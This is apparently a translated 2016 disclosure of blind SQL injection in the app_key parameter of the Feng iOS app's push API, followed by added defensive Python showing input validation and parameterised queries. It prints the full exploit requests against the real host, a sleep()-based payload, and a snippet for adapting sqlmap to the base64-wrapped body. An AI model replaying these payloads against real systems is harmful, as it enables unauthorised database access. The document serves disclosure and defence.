2016-02-23: Details reported to the vendor, awaiting vendor handling. 2016-02-28: The vendor actively ignored the vulnerability; details disclosed to the public.
App Security: SQL Injection
Target: testing the Feng (威锋) iOS app found SQL injection at the following location:
POST http://push.feng.com/index.php?r=api/client/startdevicecall HTTP/1.1
Host: push.feng.com
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Proxy-Connection: keep-alive
Accept: */*
User-Agent: WPForumPortal/4.2 (iPhone; iOS 9.2.1; Scale/2.00)
Accept-Language: zh-Hans-CN;q=1
Content-Length: 1555
Accept-Encoding: gzip, deflate

data=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%3D
The POST body, Base64-decoded (the injectable parameter is app_key; time-based blind injection):
data={"app_key":"ade966d51f5259edad1346347c512740","verify":"949c18e15ad6d040db80577ce515476f","encrypt_data":"wntQ\/xBw6bvaEvM1nW2yJB3x9q0lH7auwFD3epET7TcD7+nA2XWoM5drb33FIcJNwBzTGawW7j\/TTsY0fbJt7vxpXaZvfQd2aEMfco4SNn9XAf+N53TCez3M5U1p0i3KLzAeRWDEK8gNQZ063UYDn\/RcxxZBXW5fX1EKPg6YCdGOwBAiQnc5v5ALWOxNe7f1078eMEP1na\/4Q9E7DMWYDNjd4CwDKye2Mpb6rornkem9yNwtDJk2+Y83t0MxsHZQbTStxgpIEtp37JaLVtKTcMoAJT1fBmxap66QgLvhLcOmHOxXIxtWrgNxa3qMxWGfgtFaqML0OmAXCY2n9O9KovMoDced6EXkmRw\/aLkV7xzyx5dwUpmloHThLC6VP8xHyILqZM079B7xXPaEK8QmyXVc7PEdrviOODvXJhmf96RKDm7Wsb5hm6Qr+8hQ8SzEAtSxBNF2bwHGaYgbh\/cd4Tsd4XtN8kGhtHX1QnsGccUHZxNcGcQsXuqcn+qKgLyy5iJ\/kv3Sc6BZ8FU11kh+nY2Ei97\/+RMEe+ZQGDPbOvz6NNs2RuINQLva8mElE\/tdyoQTKHu6p+2cZd7AaJfJ+RNFN+gWG0BU61afISknEAQ0AxRIhluEklGzgQw6xvSc5mwxSgpAZH0CG5SJQ50GTV1QLAs5aI1wKp2Kw+T1NJ8VKFlWJnHPLPKdCgx8G6w4ULMWAKKM3yBWEP\/nfqEFxqCt1W++HwCJWHS0EI5TeSL7Iwm+DHJt+MuU1OnrZ8StRz7hcaPkchj3rgRM1P\/mXZiFStstgflmt4msdamNBjbBb8BG9rsv8Jglg0tl6jLnaEzVK0ON5KY5kFKJmXW96TeHnDjRISC4BNzAIJP\/Q1Pej3Bwflg\/LYWMc4+VoEUgg5vw9jI0eeW6jL3C2B\/BFOy7hr8laADIS\/jpisrTL4YoBZ84BVOVdlT2RLBa5ZNBRmJuhTCiAKyNwFCEY757\/IO8mmi1fNKEe2hf4wWGKRnM1IH8Zg+vviKJd7kiqbyDpplbfVX92AM="}
Payload (3-second delay):
{"app_key":"(select(0)from(select(sleep(0)))v)\/*'+(select(0)from(select(sleep(3)))v)+'\"+(select(0)from(select(sleep(0)))v)+\"*\/","encrypt_data":"wntQ\/xBw6bvaEvM1nW2yJB3x9q0lH7auwFD3epET7TcD7+nA2XWoM5drb33FIcJNwBzTGawW7j\/TTsY0fbJt7vxpXaZvfQd2aEMfco4SNn9XAf+N53TCez3M5U1p0i3KLzAeRWDEK8gNQZ063UYDn\/RcxxZBXW5fX1EKPg6YCdGOwBAiQnc5v5ALWOxNe7f1078eMEP1na\/4Q9E7DMWYDNjd4CwDKye2Mpb6rornkem9yNwtDJk2+Y83t0MxsHZQbTStxgpIEtp37JaLVtKTcMoAJT1fBmxap66QgLvhLcOmHOxXIxtWrgNxa3qMxWGfgtFaqML0OmAXCY2n9O9KovMoDced6EXkmRw\/aLkV7xzyx5dwUpmloHThLC6VP8xHyILqZM079B7xXPaEK8QmyXVc7PEdrviOODvXJhmf96RKDm7Wsb5hm6Qr+8hQ8SzEAtSxBNF2bwHGaYgbh\/cd4Tsd4XtN8kGhtHX1QnsGccUHZxNcGcQsXuqcn+qKgLyy5iJ\/kv3Sc6BZ8FU11kh+nY2Ei97\/+RMEe+ZQGDPbOvz6NNs2RuINQLva8mElE\/tdyoQTKHu6p+2cZd7AaJfJ+RNFN+gWG0BU61afISknEAQ0AxRIhluEklGzgQw6xvSc5mwxSgpAZH0CG5SJQ50GTV1QLAs5aI1wKp2Kw+T1NJ8VKFlWJnHPLPKdCgx8G6w4ULMWAKKM3yBWEP\/nfqEFxqCt1W++HwCJWHS0EI5TeSL7Iwm+DHJt+MuU1OnrZ8StRz7hcaPkchj3rgRM1P\/mXZiFStstgflmt4msdamNBjbBb8BG9rsv8Jglg0tl6jLnaEzVK0ON5KY5kFKJmXW96TeHnDjRISC4BNzAIJP\/Q1Pej3Bwflg\/LYWMc4+VoEUgg5vw9jI0eeW6jL3C2B\/BFOy7hr8laADIS\/jpisrTL4YoBZ84BVOVdlT2RLBa5ZNBRmJuhTCiAKyNwFCEY757\/IO8mmi1fNKEe2hf4wWGKRnM1IH8Zg+vviKJd7kiqbyDpplbfVX92AM=","verify":"949c18e15ad6d040db80577ce515476f"}
POST /index.php?r=api/client/startdevicecall HTTP/1.1
Content-Length: 1673
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://push.feng.com/index.php?r=api/client/startdevicecall
Host: push.feng.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

data=eyJhcHBfa2V5IjoiKHNlbGVjdCgwKWZyb20oc2VsZWN0KHNsZWVwKDApKSl2KVwvKicrKHNlbGVjdCgwKWZyb20oc2VsZWN0KHNsZWVwKDApKSl2KSsnXCIrKHNlbGVjdCgwKWZyb20oc2VsZWN0KHNsZWVwKDApKSl2KStcIipcLyIsImVuY3J5cHRfZGF0YSI6IndudFFcL3hCdzZidmFFdk0xblcyeUpCM3g5cTBsSDdhdXdGRDNlcEVUN1RjRDcrbkEyWFdvTTVkcmIzM0ZJY0pOd0J6VEdhd1c3alwvVFRzWTBmYkp0N3Z4cFhhWnZmUWQyYUVNZmNvNFNObjlYQWYrTjUzVENlejNNNVUxcDBpM0tMekFlUldERUs4Z05RWjA2M1VZRG5cL1JjeHhaQlhXNWZYMUVLUGc2WUNkR093QkFpUW5jNXY1QUxXT3hOZTdmMTA3OGVNRVAxbmFcLzRROUU3RE1XWUROamQ0Q3dES3llMk1wYjZyb3Jua2VtOXlOd3RESmsyK1k4M3QwTXhzSFpRYlRTdHhncElFdHAzN0phTFZ0S1RjTW9BSlQxZkJteGFwNjZRZ0x2aExjT21IT3hYSXh0V3JnTnhhM3FNeFdHZmd0RmFxTUwwT21BWENZMm45TzlLb3ZNb0RjZWQ2RVhrbVJ3XC9hTGtWN3h6eXg1ZHdVcG1sb0hUaExDNlZQOHhIeUlMcVpNMDc5Qjd4WFBhRUs4UW15WFZjN1BFZHJ2aU9PRHZYSmhtZjk2UktEbTdXc2I1aG02UXIrOGhROFN6RUF0U3hCTkYyYndIR2FZZ2JoXC9jZDRUc2Q0WHROOGtHaHRIWDFRbnNHY2NVSFp4TmNHY1FzWHVxY24rcUtnTHl5NWlKXC9rdjNTYzZCWjhGVTExa2grblkyRWk5N1wvK1JNRWUrWlFHRFBiT3Z6Nk5OczJSdUlOUUx2YThtRWxFXC90ZHlvUVRLSHU2cCsyY1pkN0FhSmZKK1JORk4rZ1dHMEJVNjFhZklTa25FQVEwQXhSSWhsdUVrbEd6Z1F3Nnh2U2M1bXd4U2dwQVpIMENHNVNKUTUwR1RWMVFMQXM1YUkxd0twMkt3K1QxTko4VktGbFdKbkhQTFBLZENneDhHNnc0VUxNV0FLS00zeUJXRVBcL25mcUVGeHFDdDFXKytId0NKV0hTMEVJNVRlU0w3SXdtK0RISnQrTXVVMU9uclo4U3RSejdoY2FQa2NoajNyZ1JNMVBcL21YWmlGU3RzdGdmbG10NG1zZGFtTkJqYkJiOEJHOXJzdjhKZ2xnMHRsNmpMbmFFelZLME9ONUtZNWtGS0ptWFc5NlRlSG5EalJJU0M0Qk56QUlKUFwvUTFQZWozQndmbGdcL0xZV01jNCtWb0VVZ2c1dnc5akkwZWVXNmpMM0MyQlwvQkZPeTdocjhsYUFESVNcL2pwaXNyVEw0WW9CWjg0QlZPVmRsVDJSTEJhNVpOQlJtSnVoVENpQUt5TndGQ0VZNzU3XC9JTzhtbWkxZk5LRWUyaGY0d1dHS1JuTTFJSDhaZyt2dmlLSmQ3a2lxYnlEcHBsYmZWWDkyQU09IiwidmVyaWZ5IjoiOTQ5YzE4ZTE1YWQ2ZDA0MGRiODA1NzdjZTUxNTQ3NmYifQ%3d%3d
Because SQLMap's base64encode only encodes the payload portion, whereas here the entire POST body is encoded, SQLMap cannot be invoked directly. So I wrote a small Python proxy interface, routed SQLMap's traffic through it, rewrote the requests in bulk, and had the program do the base64 encoding itself~
import base64
new_postdata = 'data=' + base64.b64encode(old_postdata[5:])  # drop the leading "data=" and re-encode the whole JSON body
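The report shows why the injection was possible: the server unwraps the base64 body and splices app_key into SQL text, and the sleep() payload proves the value is never checked against the shape a real key has (32 hex characters, as in the decoded body above). The following is an added example written from the server side; it is not the vendor's code and not part of the original report. It assumes the body format the report shows (data=<base64 JSON>) and a hypothetical sqlite table named app; the app_key value and the payload string are the ones quoted in the report, everything else is constructed.

```python
import base64
import json
import re
import sqlite3
from urllib.parse import parse_qs, quote

# Shape of a legitimate app_key as seen in the report: 32 lowercase hex characters.
APP_KEY_RE = re.compile(r"^[0-9a-f]{32}$")

# Constructed sample payloads. app_key/verify are the values quoted in the report;
# encrypt_data is a placeholder. INJECTED carries the report's sleep() payload.
LEGIT = {
    "app_key": "ade966d51f5259edad1346347c512740",
    "verify": "949c18e15ad6d040db80577ce515476f",
    "encrypt_data": "PLACEHOLDER",
}
INJECTED = dict(
    LEGIT,
    app_key='(select(0)from(select(sleep(0)))v)/*\'+(select(0)from(select(sleep(3)))v)+\'"'
            '+(select(0)from(select(sleep(0)))v)+"*/',
)


def encode_body(obj):
    """Build the form body the way the client does: data=<base64(JSON)>, URL-encoded."""
    b64 = base64.b64encode(json.dumps(obj).encode()).decode()
    return "data=" + quote(b64, safe="")


def decode_body(raw_body):
    """Server side: form field -> strict base64 -> JSON, rejecting anything malformed."""
    fields = parse_qs(raw_body, keep_blank_values=True)
    if "data" not in fields:
        raise ValueError("missing data field")
    try:
        # validate=True refuses non-alphabet characters instead of silently skipping them
        return json.loads(base64.b64decode(fields["data"][0], validate=True))
    except ValueError as exc:  # binascii.Error and JSONDecodeError both subclass ValueError
        raise ValueError("data is not base64-encoded JSON") from exc


def check_request(raw_body):
    """Return (accepted, detail). Rejects any app_key that is not a 32-char hex string."""
    try:
        payload = decode_body(raw_body)
    except ValueError as exc:
        return False, str(exc)
    key = payload.get("app_key")
    if not isinstance(key, str) or not APP_KEY_RE.fullmatch(key):
        return False, "app_key is not a 32-character hex string"
    return True, key


def lookup_app(conn, app_key):
    """Parameterised query: the value is bound by the driver, never spliced into SQL text."""
    row = conn.execute("SELECT name FROM app WHERE app_key = ?", (app_key,)).fetchone()
    return row[0] if row else None


def demo_db():
    """Constructed in-memory table standing in for the real app registry."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE app (app_key TEXT PRIMARY KEY, name TEXT)")
    conn.execute("INSERT INTO app VALUES (?, ?)", (LEGIT["app_key"], "feng-ios"))
    return conn


if __name__ == "__main__":
    conn = demo_db()
    for body in (encode_body(LEGIT), encode_body(INJECTED)):
        ok, detail = check_request(body)
        if ok:
            print("accepted, app =", lookup_app(conn, detail))
        else:
            print("rejected:", detail)
```

The two layers are independent: the format check stops the payload before any query runs and gives a clean log line to alert on, while the bound parameter means that even a key which slipped past validation could not change the query's structure. Decoding with validate=True matters too, since a lenient decoder would let an attacker hide characters in the encoded layer that a WAF never sees.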
Finally, the database name as proof:
Any feedback welcome~
Severity: No impact (vendor ignored)
Ignored on: 2016-02-28 13:50
Vulnerability Rank: 15 (WooYun rating)
None